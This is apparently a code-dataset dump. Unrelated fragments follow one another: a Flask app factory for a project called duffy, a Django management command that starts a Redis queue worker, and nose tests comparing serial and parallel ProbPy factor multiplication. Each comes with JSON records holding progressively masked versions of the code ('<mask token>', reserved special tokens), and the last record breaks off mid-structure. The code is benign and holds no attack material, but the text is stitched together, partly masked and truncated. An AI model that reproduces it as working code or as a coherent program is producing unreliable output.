def register_blueprints(app):
app.register_blueprint(api_v1.views.blueprint)
app.register_blueprint(seamicro.views.blueprint)
return None
def register_errorhandlers(app):
return None
|
normal
|
{
"blob_id": "11101273a02abec17fc884d5c1d5d182eb82ee0c",
"index": 4625,
"step-1": "<mask token>\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\n<mask token>\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-2": "<mask token>\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\n<mask token>\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-3": "<mask token>\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db, render_as_batch=True)\n marshmallow.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-4": "<mask token>\nfrom flask import Flask\nfrom duffy import api_v1\nfrom duffy.types import seamicro\nfrom duffy.extensions import db, migrate, marshmallow\nfrom duffy.config import ProdConfig, DevConfig\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS', silent=True)\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db, render_as_batch=True)\n marshmallow.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"The main application module for duffy.\"\"\"\nfrom flask import Flask\n\nfrom duffy import api_v1\nfrom duffy.types import seamicro\n\nfrom duffy.extensions import db, migrate, marshmallow\nfrom duffy.config import ProdConfig,DevConfig\n\n\ndef create_app(config_object=DevConfig):\n app = Flask(__name__.split('.')[0])\n app.config.from_object(config_object)\n app.config.from_envvar('DUFFY_SETTINGS',silent=True)\n\n register_extensions(app)\n register_blueprints(app)\n register_errorhandlers(app)\n return app\n\n\ndef register_extensions(app):\n db.init_app(app)\n migrate.init_app(app, db, render_as_batch=True)\n marshmallow.init_app(app)\n return None\n\n\ndef register_blueprints(app):\n app.register_blueprint(api_v1.views.blueprint)\n app.register_blueprint(seamicro.views.blueprint)\n return None\n\n\ndef register_errorhandlers(app):\n return None\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Command(BaseCommand):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Command(BaseCommand):
def handle(self, *args, **options):
rqueue = RedisQueue(settings.REDIS_URL)
rqueue.worker()
<|reserved_special_token_1|>
from django.core.management.base import BaseCommand, CommandError
from tasks.redisqueue import RedisQueue
from django.conf import settings
class Command(BaseCommand):
def handle(self, *args, **options):
rqueue = RedisQueue(settings.REDIS_URL)
rqueue.worker()
|
flexible
|
{
"blob_id": "cccf6ec50ae00d8e00a1a53ea06fa8b6d061b72e",
"index": 8258,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Command(BaseCommand):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n rqueue = RedisQueue(settings.REDIS_URL)\n rqueue.worker()\n",
"step-4": "from django.core.management.base import BaseCommand, CommandError\nfrom tasks.redisqueue import RedisQueue\nfrom django.conf import settings\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n rqueue = RedisQueue(settings.REDIS_URL)\n rqueue.worker()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from nose.tools import with_setup, nottest
from tests.par_test_base import ParTestBase
from ProbPy import RandVar, Factor, ParFactor
class TestFactorMult(ParTestBase):
def __init__(self):
super().__init__()
def par_test_0(self):
"""
f(X), scalar
"""
for i in range(4):
self.X_par_factor.setMaxDepth(i)
res = [
self.X_factor.mult(self.scalar),
self.X_factor.mult(self.scalarf),
self.scalarf.mult(self.X_factor),
]
par_res = [
self.X_par_factor.mult(self.scalar),
self.X_par_factor.mult(self.par_scalarf),
self.par_scalarf.mult(self.X_par_factor),
]
for i, ele in enumerate(res):
assert (
ele.rand_vars == par_res[i].rand_vars
and ele.values == par_res[i].values
)
def par_test_1(self):
"""
f(X, Y), scalar
"""
for i in range(4):
self.XY_par_factor.setMaxDepth(i)
self.XY_par_factor.setMaxDepth(i)
res = [
self.XY_factor.mult(self.scalar),
self.XY_factor.mult(self.scalarf),
self.scalarf.mult(self.XY_factor),
]
par_res = [
self.XY_par_factor.mult(self.scalar),
self.XY_par_factor.mult(self.par_scalarf),
self.par_scalarf.mult(self.XY_par_factor),
]
for i, ele in enumerate(res):
assert (
ele.rand_vars == par_res[i].rand_vars
and ele.values == par_res[i].values
)
def par_test_2(self):
"""
f(X, Y, Z), scalar
"""
for i in range(4):
self.XYZ_par_factor.setMaxDepth(i)
self.XYZ_par_factor.setMaxDepth(i)
res = [
self.XYZ_factor.mult(self.scalar),
self.XYZ_factor.mult(self.scalarf),
self.scalarf.mult(self.XYZ_factor),
]
par_res = [
self.XYZ_par_factor.mult(self.scalar),
self.XYZ_par_factor.mult(self.par_scalarf),
self.par_scalarf.mult(self.XYZ_par_factor),
]
for i, ele in enumerate(res):
assert (
ele.rand_vars == par_res[i].rand_vars
and ele.values == par_res[i].values
)
def par_test_3(self):
"""
f(X), f(X)
"""
for i in range(4):
self.X_par_factor.setMaxDepth(i)
res = self.X_factor.mult(self.X_factor)
par_res = self.X_par_factor.mult(self.X_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_4(self):
"""
f(X), f(Y)
"""
for i in range(4):
self.X_par_factor.setMaxDepth(i)
self.Y_par_factor.setMaxDepth(i)
res = self.X_factor.mult(self.Y_factor)
par_res = self.X_par_factor.mult(self.Y_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_5(self):
"""
f(X, Y) f(X)
"""
for i in range(4):
self.X_par_factor.setMaxDepth(i)
self.XY_par_factor.setMaxDepth(i)
res = self.XY_factor.mult(self.X_factor)
par_res = self.XY_par_factor.mult(self.X_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_6(self):
"""
f(X, Y) f(Y)
"""
for i in range(4):
self.Y_par_factor.setMaxDepth(i)
self.XY_par_factor.setMaxDepth(i)
res = self.XY_factor.mult(self.Y_factor)
par_res = self.XY_par_factor.mult(self.Y_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_7(self):
"""
f(X, Y) f(Z)
"""
for i in range(4):
self.Z_par_factor.setMaxDepth(i)
self.XY_par_factor.setMaxDepth(i)
res = self.XY_factor.mult(self.Z_factor)
par_res = self.XY_par_factor.mult(self.Z_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_8(self):
"""
f(X, Y) f(X, Y)
"""
for i in range(4):
self.XY_par_factor.setMaxDepth(i)
self.XY_par_factor.setMaxDepth(i)
res = self.XY_factor.mult(self.XY_factor)
par_res = self.XY_par_factor.mult(self.XY_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_9(self):
"""
f(X, Y) F(X, Z)
"""
for i in range(4):
self.XY_par_factor.setMaxDepth(i)
self.XZ_par_factor.setMaxDepth(i)
res = self.XY_factor.mult(self.XZ_factor)
par_res = self.XY_par_factor.mult(self.XZ_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_10(self):
"""
f(X, Y) f(Z, W)
"""
for i in range(4):
self.XY_par_factor.setMaxDepth(i)
self.ZW_par_factor.setMaxDepth(i)
res = self.XY_factor.mult(self.ZW_factor)
par_res = self.XY_par_factor.mult(self.ZW_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_11(self):
"""
f(X, Y, Z) f(X, Y, Z)
"""
for i in range(4):
self.XYZ_par_factor.setMaxDepth(i)
self.XYZ_par_factor.setMaxDepth(i)
res = self.XYZ_factor.mult(self.XYZ_factor)
par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_12(self):
"""
f(X, Y, Z) f(X, Y, W)
"""
for i in range(4):
self.XYZ_par_factor.setMaxDepth(i)
self.XYW_par_factor.setMaxDepth(i)
res = self.XYZ_factor.mult(self.XYW_factor)
par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_13(self):
"""
f(X, Y, Z) f(X, K, W)
"""
for i in range(4):
self.XYZ_par_factor.setMaxDepth(i)
self.XKW_par_factor.setMaxDepth(i)
res = self.XYZ_factor.mult(self.XKW_factor)
par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
def par_test_14(self):
"""
f(X, Y, Z) f(T, K, W)
"""
for i in range(4):
self.XYZ_par_factor.setMaxDepth(i)
self.TKW_par_factor.setMaxDepth(i)
res = self.XYZ_factor.mult(self.TKW_factor)
par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)
assert res.rand_vars == par_res.rand_vars and res.values == par_res.values
|
normal
|
{
"blob_id": "0aad96de65cc125e5c026dfd72a9cc9f4ebd3dd2",
"index": 6486,
"step-1": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n <mask token>\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n <mask token>\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-3": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n\n def par_test_0(self):\n \"\"\"\n f(X), scalar\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = [self.X_factor.mult(self.scalar), self.X_factor.mult(self\n .scalarf), self.scalarf.mult(self.X_factor)]\n par_res = [self.X_par_factor.mult(self.scalar), self.\n X_par_factor.mult(self.par_scalarf), self.par_scalarf.mult(\n self.X_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n <mask token>\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
"step-4": "<mask token>\n\n\nclass TestFactorMult(ParTestBase):\n\n def __init__(self):\n super().__init__()\n\n def par_test_0(self):\n \"\"\"\n f(X), scalar\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = [self.X_factor.mult(self.scalar), self.X_factor.mult(self\n .scalarf), self.scalarf.mult(self.X_factor)]\n par_res = [self.X_par_factor.mult(self.scalar), self.\n X_par_factor.mult(self.par_scalarf), self.par_scalarf.mult(\n self.X_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n\n def par_test_1(self):\n \"\"\"\n f(X, Y), scalar\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = [self.XY_factor.mult(self.scalar), self.XY_factor.mult(\n self.scalarf), self.scalarf.mult(self.XY_factor)]\n par_res = [self.XY_par_factor.mult(self.scalar), self.\n XY_par_factor.mult(self.par_scalarf), self.par_scalarf.mult\n (self.XY_par_factor)]\n for i, ele in enumerate(res):\n assert ele.rand_vars == par_res[i\n ].rand_vars and ele.values == par_res[i].values\n <mask token>\n\n def par_test_3(self):\n \"\"\"\n f(X), f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.X_factor)\n par_res = self.X_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_4(self):\n \"\"\"\n f(X), f(Y)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.Y_par_factor.setMaxDepth(i)\n res = self.X_factor.mult(self.Y_factor)\n par_res = self.X_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_5(self):\n \"\"\"\n f(X, Y) f(X)\n \"\"\"\n for i in range(4):\n self.X_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.X_factor)\n par_res = self.XY_par_factor.mult(self.X_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_6(self):\n \"\"\"\n f(X, Y) f(Y)\n \"\"\"\n for i in range(4):\n self.Y_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Y_factor)\n par_res = self.XY_par_factor.mult(self.Y_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_7(self):\n \"\"\"\n f(X, Y) f(Z)\n \"\"\"\n for i in range(4):\n self.Z_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.Z_factor)\n par_res = self.XY_par_factor.mult(self.Z_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_8(self):\n \"\"\"\n f(X, Y) f(X, Y)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XY_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XY_factor)\n par_res = self.XY_par_factor.mult(self.XY_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_9(self):\n \"\"\"\n f(X, Y) F(X, Z)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.XZ_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.XZ_factor)\n par_res = self.XY_par_factor.mult(self.XZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_10(self):\n \"\"\"\n f(X, Y) f(Z, W)\n \"\"\"\n for i in range(4):\n self.XY_par_factor.setMaxDepth(i)\n self.ZW_par_factor.setMaxDepth(i)\n res = self.XY_factor.mult(self.ZW_factor)\n par_res = self.XY_par_factor.mult(self.ZW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_11(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, Z)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYZ_factor)\n par_res = self.XYZ_par_factor.mult(self.XYZ_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_12(self):\n \"\"\"\n f(X, Y, Z) f(X, Y, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XYW_factor)\n par_res = self.XYZ_par_factor.mult(self.XYW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_13(self):\n \"\"\"\n f(X, Y, Z) f(X, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.XKW_factor)\n par_res = self.XYZ_par_factor.mult(self.XKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n\n def par_test_14(self):\n \"\"\"\n f(X, Y, Z) f(T, K, W)\n \"\"\"\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.TKW_par_factor.setMaxDepth(i)\n res = self.XYZ_factor.mult(self.TKW_factor)\n par_res = self.XYZ_par_factor.mult(self.TKW_par_factor)\n assert res.rand_vars == par_res.rand_vars and res.values == par_res.values\n",
